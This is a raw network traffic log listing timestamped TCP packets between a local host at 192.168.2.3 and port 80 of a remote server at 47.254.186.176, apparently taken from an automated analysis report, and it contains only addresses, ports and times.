Jul 12, 2021 10:29:51.701993942 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702002048 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702019930 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702028036 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702045918 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702054024 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702073097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702091932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702110052 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702124119 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702140093 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702147007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702162981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702177048 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702193975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702210903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702217102 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702231884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702239037 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702254057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702272892 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702281952 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702300072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702320099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702325106 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702341080 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702351093 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702363968 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702379942 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702394962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702402115 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702416897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702433109 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702439070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702454090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702471972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702488899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702496052 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702512026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702538967 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702554941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702569962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702585936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702600002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702608109 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702621937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702630043 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702649117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702657938 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702675104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702696085 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702702999 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702721119 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702737093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702744961 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702760935 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702775955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702790022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702801943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702811956 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702825069 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702831984 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702847004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702862024 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702871084 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702887058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702897072 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702914000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702923059 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.702939034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702954054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702975035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.702986002 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.703006983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703022957 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703032970 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.703048944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703063965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703072071 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.703087091 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703103065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703134060 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.703150034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703157902 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.703176022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703188896 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703206062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703242064 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.703273058 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.703325987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703344107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703401089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703425884 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.703476906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703555107 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.703583002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703613997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703629017 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703655005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703685999 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.703711987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703718901 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.703748941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703764915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703779936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703794956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703808069 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.703819990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703836918 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703855038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703864098 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.703880072 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.703891039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703906059 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.703917980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703937054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703957081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.703960896 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.704004049 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.704446077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704464912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704482079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704498053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704519987 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.704545021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704566956 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.704756975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704772949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704786062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704797029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704808950 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704824924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704840899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704859018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704864025 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.704879045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704894066 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704909086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704924107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704943895 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704962015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.704967022 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.704982996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.705065966 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.705157995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.705195904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.705212116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.705226898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.705240965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.705265999 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.705284119 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.705296993 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.705307007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.705321074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.705327988 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.705362082 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.705704927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.705771923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.705810070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.705869913 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.705902100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.705988884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706026077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706049919 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.706075907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706098080 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.706125021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706166983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706202984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706223011 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.706247091 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706279039 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.706305027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706342936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706377029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706396103 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.706444025 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.706458092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706494093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706545115 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.706557035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706593990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706644058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706691027 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.706779957 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706862926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706878901 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.706912041 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706934929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706955910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.706988096 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.706999063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707017899 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.707037926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707345009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707379103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707406044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707427025 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.707448006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707473993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707484961 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.707506895 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.707521915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707547903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707571983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707603931 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707612038 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.707636118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707645893 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.707670927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707693100 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.707711935 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707741976 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707767010 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.707779884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707806110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707830906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707859993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707866907 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.707890034 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.707906961 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707933903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707959890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.707971096 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.707998991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708013058 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.708036900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708060980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708084106 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.708098888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708126068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708152056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708175898 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.708192110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708209038 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.708233118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708261013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708288908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708309889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.708327055 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708345890 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.708363056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708386898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708411932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708436012 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.708452940 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708477974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708489895 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.708515882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708545923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708553076 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.708581924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708606958 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.708620071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708647013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708673000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708695889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.708755970 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.708873034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708901882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708930016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708956003 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.708970070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.708996058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709022045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709048033 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709059000 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.709084988 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709112883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709130049 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.709137917 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.709162951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709192991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709218025 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.709235907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709264040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709290028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709311962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709322929 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.709350109 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709374905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709399939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709424973 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709454060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709491014 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.709522963 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.709696054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709723949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709753036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709779978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709800959 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.709820032 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709846973 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.709868908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709898949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709912062 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.709937096 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709960938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.709986925 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.710000038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710026026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710077047 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.710108042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710134983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710158110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710176945 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.710196018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710227013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710233927 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.710259914 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710277081 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.710297108 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710321903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710336924 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.710359097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710381985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710402966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710427999 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.710442066 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710474968 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710481882 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.710510969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710536957 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710561037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710571051 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.710601091 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710618973 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.710648060 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.710910082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710941076 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710983038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.710994005 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.711024046 CEST	80	49755	47.254.186.176	192.168.2.3
